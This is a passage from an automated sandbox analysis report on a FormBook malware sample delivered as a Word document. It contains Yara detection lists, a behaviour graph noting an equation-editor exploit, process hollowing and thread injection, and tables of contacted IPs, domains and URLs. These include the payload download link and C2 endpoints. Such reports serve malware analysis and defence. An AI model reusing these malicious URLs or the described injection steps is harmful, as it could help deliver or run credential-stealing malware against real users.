Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Queries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 528734 Sample: P.O-5433ERE.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 12 other signatures 2->56 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 19 2->15         started        process3 dnsIp4 44 dell-tv.tk 37.0.9.166, 49165, 80 WKD-ASIE Netherlands 10->44 32 C:\Users\user\AppData\...\ashlkyvc7592.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\ashlyzx[1].exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 ashlkyvc7592.exe 10->17         started        36 ~WRF{3D999299-2169...1-6FEE86AD4ADA}.tmp, Composite 15->36 dropped file5 signatures6 process7 signatures8 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 ashlkyvc7592.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.texaszephyr.com 23->38 40 www.volunteervabetweenk.com 172.67.184.102, 49169, 80 CLOUDFLARENETUS United States 23->40 42 6 other IPs or domains 23->42 66 System process connects to network (likely due to code injection or exploit) 23->66 27 cmstp.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.184.102
 www.volunteervabetweenk.com United States
13335 CLOUDFLARENETUS true
34.102.136.180
 publicfigure.skin United States
15169 GOOGLEUS false
37.0.9.166
 dell-tv.tk Netherlands
198301 WKD-ASIE true

Private
IP
192.168.2.255

Contacted Domains

Name IP Active
dell-tv.tk 37.0.9.166 true
publicfigure.skin 34.102.136.180 true
www.volunteervabetweenk.com 172.67.184.102 true
texaszephyr.com 34.102.136.180 true
www.texaszephyr.com unknown unknown
www.1oavyx.com unknown unknown
www.bandhancustomer.com unknown unknown
www.publicfigure.skin unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== false
  • Avira URL Cloud: safe
 unknown
http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== true
  • Avira URL Cloud: safe
 unknown
http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F false
  • Avira URL Cloud: safe
 unknown
http://dell-tv.tk/ashlyzx.exe true
  • Avira URL Cloud: safe
 unknown
www.fcusd4.com/op9t/ true
  • Avira URL Cloud: safe
 low